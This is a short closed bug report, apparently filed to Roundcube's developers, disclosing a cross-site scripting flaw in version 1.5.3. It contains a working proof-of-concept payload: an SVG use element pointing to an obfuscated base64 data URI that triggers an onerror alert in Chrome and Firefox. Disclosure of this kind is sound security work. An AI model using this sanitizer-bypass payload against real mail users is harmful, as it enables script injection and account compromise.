Closed
Description
Hello dear developers!
Next sample shows me XSS. Would be pleased if you could check it on latest Roundcube version.
Reproduce:
- Send html to your mailbox with following content
<svg><use href="dAta:image/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">This is encoded string to base64 that you see above:
<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>- Ensure browser alerts with "234"
Env
RoundCube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozila Firefox (117.0.1 (64-bit))
Thanks!